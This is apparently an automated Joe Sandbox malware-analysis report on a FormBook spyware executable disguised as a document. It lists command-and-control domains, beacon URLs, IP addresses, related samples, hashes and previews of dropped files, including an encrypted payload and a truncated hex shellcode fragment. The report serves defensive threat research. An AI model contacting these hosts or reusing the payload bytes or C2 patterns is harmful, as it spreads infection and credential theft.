                                                                https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jsnetbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.sedo.com/services/parking.php3dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000330E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 0000000A.00000002.3692885046.00000000048D2000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003632000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://donnavariedades.com/fo8o?FBEd=lnetbtugc.exe, 0000000A.00000002.3692885046.0000000004BF6000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003956000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWinetbtugc.exe, 0000000A.00000002.3692885046.000000000428A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 0000000A.00000002.3692885046.00000000048D2000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003632000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://hm.baidu.com/hm.js?netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsnetbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.cssnetbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.empowermedeco.com/fo8o/?FBEd=mxnRnetbtugc.exe, 0000000A.00000002.3692885046.0000000004F1A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003C7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    91.195.240.94
                                                                                    www.rssnewscast.comGermany
                                                                                    47846SEDO-ASDEfalse
                                                                                    185.237.107.49
                                                                                    www.joyesi.xyzUkraine
                                                                                    56421UA-WEECOMI-ASUAtrue
                                                                                    154.215.72.110
                                                                                    www.3xfootball.comSeychelles
                                                                                    132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                    195.110.124.133
                                                                                    elettrosistemista.zipItaly
                                                                                    39729REGISTER-ASITfalse
                                                                                    34.111.148.214
                                                                                    www.660danm.topUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    116.50.37.244
                                                                                    www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                    18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                    23.227.38.74
                                                                                    shops.myshopify.comCanada
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    85.159.66.93
                                                                                    natroredirect.natrocdn.comTurkey
                                                                                    34619CIZGITRfalse
                                                                                    202.172.28.202
                                                                                    www.kasegitai.tokyoJapan37907DIGIROCKDigiRockIncJPfalse
                                                                                    46.30.213.191
                                                                                    www.antonio-vivaldi.mobiDenmark
                                                                                    51468ONECOMDKfalse
                                                                                    66.29.149.46
                                                                                    www.techchains.infoUnited States
                                                                                    19538ADVANTAGECOMUSfalse
                                                                                    217.196.55.202
                                                                                    empowermedeco.comNorway
                                                                                    29300AS-DIRECTCONNECTNOfalse
                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                    Analysis ID:1438042
                                                                                    Start date and time:2024-05-08 10:47:43 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 10m 32s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:16
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:2
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Document 151-512024.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/5@14/12
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 91%
                                                                                    • Number of executed functions: 49
                                                                                    • Number of non-executed functions: 300
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    TimeTypeDescription
                                                                                    10:49:23API Interceptor10545212x Sleep call for process: netbtugc.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    91.195.240.94SHIPMT-97 6533 1936ROBUTECH.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • www.winhgx.com/u88q/
                                                                                    BE.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.5597043.com/nrup/
                                                                                    Arrival Notice.docGet hashmaliciousFormBookBrowse
                                                                                    • www.5597043.com/nrup/
                                                                                    SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • www.5597043.com/nrup/
                                                                                    150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    Statement Of Account.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.b-a-s-e.net/gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5
                                                                                    SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                                                    • www.winhgx.com/r6ib/
                                                                                    185.237.107.49150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                        DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                          154.215.72.110150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                            SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                              DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  195.110.124.133SHIPMT-97 6533 1936ROBUTECH.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.dosacontrol.com/u88q/
                                                                                                  150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                                  SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                                  yx0H3RO9ur.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.rcpbooks.site/ns03/?UPlLi=vFQdbbR8L2nPLn&uTsxF=LY9IMeCXDxrmkBkQpTG36JChwL1RxDqQm+j8bD1e2UXkf2UJCaZNetcSSzDM9AEFNVBS
                                                                                                  Grundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.guiguigohost.com/m9so/
                                                                                                  Apexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.guiguigohost.com/m9so/
                                                                                                  oZF2kXw4ZRc8NjL.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.rcpbooks.site/ns03/?wHut=ghlHUvuPX&yBkpfpPX=LY9IMeCXDxrmkBkQpTG36JChwL1RxDqQm+j8bD1e2UXkf2UJCaZNetcSSzDM9AEFNVBS
                                                                                                  Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.guiguigohost.com/m9so/
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  www.joyesi.xyz150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 185.237.107.49
                                                                                                  SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 185.237.107.49
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 185.237.107.49
                                                                                                  Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 185.237.107.49
                                                                                                  www.3xfootball.com150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 154.215.72.110
                                                                                                  SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 154.215.72.110
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 154.215.72.110
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 154.215.72.110
                                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.14209.1079.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 154.215.74.46
                                                                                                  www.antonio-vivaldi.mobi150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 46.30.213.191
                                                                                                  SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 46.30.213.191
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 46.30.213.191
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 46.30.213.191
                                                                                                  doc2009988876370093845_1601202400.exeGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                  • 46.30.213.185
                                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.14209.1079.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 46.30.213.185
                                                                                                  PO203-09024.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 46.30.213.185
                                                                                                  PO#YATCH-INT'L.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 46.30.213.185
                                                                                                  QUOTATIONYATCHINT'L.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 46.30.213.185
                                                                                                  PURCHASE_ORDER_091020.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 46.30.213.185
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHKOSL332C-HBLx#U180es#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                                                                  • 160.124.95.43
                                                                                                  YLvVXuRyhA.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 154.218.213.199
                                                                                                  JQf0ehYRnW.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 154.215.127.76
                                                                                                  2024_04_005.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 160.124.21.234
                                                                                                  file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • 156.242.52.107
                                                                                                  Scan File_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 156.242.52.107
                                                                                                  BnH5cceMGl.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 160.124.107.231
                                                                                                  150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 154.215.72.110
                                                                                                  oVOImRIAaz.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 156.252.113.238
                                                                                                  m2 Cotizaci#U00f3n-1634.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 160.124.21.234
                                                                                                  REGISTER-ASITz8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                                                                                                  • 81.88.58.196
                                                                                                  SHIPMT-97 6533 1936ROBUTECH.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 195.110.124.133
                                                                                                  2024_04_005.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 81.88.63.46
                                                                                                  shipping doc.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 81.88.63.46
                                                                                                  150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 195.110.124.133
                                                                                                  SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 195.110.124.133
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 195.110.124.133
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 195.110.124.133
                                                                                                  160420241245287.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 81.88.63.46
                                                                                                  2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 81.88.63.46
                                                                                                  UA-WEECOMI-ASUA150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 185.237.107.49
                                                                                                  SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 185.237.107.49
                                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 185.237.107.49
                                                                                                  SEDO-ASDERE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • 91.195.240.19
                                                                                                  LS24SDE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • 91.195.240.123
                                                                                                  kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 91.195.240.19
                                                                                                  SARAY_RECEIPT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 91.195.240.19
                                                                                                  SHIPMT-97 6533 1936ROBUTECH.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 91.195.240.94
                                                                                                  Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 91.195.240.123
                                                                                                  factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 91.195.240.123
                                                                                                  Demand G2-2024.xlsxGet hashmaliciousFormBookBrowse
                                                                                                  • 91.195.240.19
                                                                                                  POD-L2024.05.06 MSC DESIREE DS5016RTA24.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • 91.195.240.123
                                                                                                  Inv 070324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • 91.195.240.19
                                                                                                  No context
                                                                                                  No context
                                                                                                  Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                  Category:dropped
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):1.1211596417522893
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                  MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                  SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                  SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                  SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Document 151-512024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):270848
                                                                                                  Entropy (8bit):7.994029046453044
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:3072:P8mwFzK0eX0mcT2dftSU1THjhRqU3S2FabA1im6R2ldqgTtSxEMozosAGyDt/Fk9:UmQK0/mcTkt9LmUTsc1X5SyMTslylFTq
                                                                                                  MD5:3B92C7C7E1D069D027090BBB8C4C6B3C
                                                                                                  SHA1:473EE15A3C0ADF847ED03B6861EE051C78E6384C
                                                                                                  SHA-256:297D72A6CA8E98558823B71F551EC72508B1ADCEC64596D41387978FD0FFBD54
                                                                                                  SHA-512:D5C52DDD13AB9B2A47159C46FA8E50E54794977D5740ABFA2B6BA0456AD0381750110749804FFC771213189BE1CDCA1EC89C174E87C72C71AF3D1CA4F7300E4E
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:x.w..G3YS...8....5P...o0Q...91FYPB505S2R3G3YSEK91FYPB505S2.3G3WL.E9.O.q.4|.rf:Z4.)!*,KP+y3#[^Z'.0VgA,=e"W....bX_Q6._>M.YSEK91F QK..U4.oS .d3".#..j"R./....'T.I....&>..\S]nR5.G3YSEK91..PBy14S.:..3YSEK91F.P@4;4X2R#C3YSEK91FY.W505C2R3g7YSE.91VYPB705U2R3G3YSCK91FYPB5.1S2P3G3YSEI9q.YPR50%S2R3W3YCEK91FY@B505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91Fw$'MD5S2.<C3YCEK9!BYPR505S2R3G3YSEK9.FY0B505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK9
                                                                                                  Process:C:\Users\user\Desktop\Document 151-512024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9896
                                                                                                  Entropy (8bit):7.592587996331733
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:C+cK50L02Jtyl2ftvwmziMVC6baopzBvq5C4RoZJzOjXyBwhbfsYSGWQ9E:h750LRJtyl2ftLCghBmNoZPBefsYhWQG
                                                                                                  MD5:9DB7D0DE71A42A1D64D9F7575FE55330
                                                                                                  SHA1:5AEE9FCA4411B58EBF5B3EDB6E43BFFFAE69FD0A
                                                                                                  SHA-256:C418456986F2FF67D6BE6A0F9C6981E21A21D8E5CF7B4153EAA3C320965B7E3E
                                                                                                  SHA-512:39BBF2070AB7927F164B1180180E8CC4ACA8F6F9512F165597E44BB771F0EAC4A9FB386AEDAF232AFD96CA8C80103F3C35D6DC87A7D2B8CC0132A78B65045AB9
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:EA06..p0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                                                                                  Process:C:\Users\user\Desktop\Document 151-512024.exe
                                                                                                  File Type:ASCII text, with very long lines (28720), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):28720
                                                                                                  Entropy (8bit):3.5960357651055395
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNboE+I026c024vfF3if68:wiTZ+2QoioGRk6ZklputwjpjBkCiw2R3
                                                                                                  MD5:EF71BFB3991697BEB75010ABE4817290
                                                                                                  SHA1:EC310A5F22E9D788B6CB79649FF462DCD39BA618
                                                                                                  SHA-256:68846BAEDE1947F26706A4A795C0BEFD6D71BA3223ACE3278AD5ADD04849F077
                                                                                                  SHA-512:854496BB780192D0DC0101DE31B08F8E610AD2B73571A18A1342065D5C1398A489FA645475B7C3DAA205BCD19B6ACA1FEF43AE1F6B1192AC2FB338DEE4D81DC4
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066
                                                                                                  Process:C:\Users\user\Desktop\Document 151-512024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):270848
                                                                                                  Entropy (8bit):7.994029046453044
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:3072:P8mwFzK0eX0mcT2dftSU1THjhRqU3S2FabA1im6R2ldqgTtSxEMozosAGyDt/Fk9:UmQK0/mcTkt9LmUTsc1X5SyMTslylFTq
                                                                                                  MD5:3B92C7C7E1D069D027090BBB8C4C6B3C
                                                                                                  SHA1:473EE15A3C0ADF847ED03B6861EE051C78E6384C
                                                                                                  SHA-256:297D72A6CA8E98558823B71F551EC72508B1ADCEC64596D41387978FD0FFBD54
                                                                                                  SHA-512:D5C52DDD13AB9B2A47159C46FA8E50E54794977D5740ABFA2B6BA0456AD0381750110749804FFC771213189BE1CDCA1EC89C174E87C72C71AF3D1CA4F7300E4E
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:x.w..G3YS...8....5P...o0Q...91FYPB505S2R3G3YSEK91FYPB505S2.3G3WL.E9.O.q.4|.rf:Z4.)!*,KP+y3#[^Z'.0VgA,=e"W....bX_Q6._>M.YSEK91F QK..U4.oS .d3".#..j"R./....'T.I....&>..\S]nR5.G3YSEK91..PBy14S.:..3YSEK91F.P@4;4X2R#C3YSEK91FY.W505C2R3g7YSE.91VYPB705U2R3G3YSCK91FYPB5.1S2P3G3YSEI9q.YPR50%S2R3W3YCEK91FY@B505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91Fw$'MD5S2.<C3YCEK9!BYPR505S2R3G3YSEK9.FY0B505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK9
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.133480817080476
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
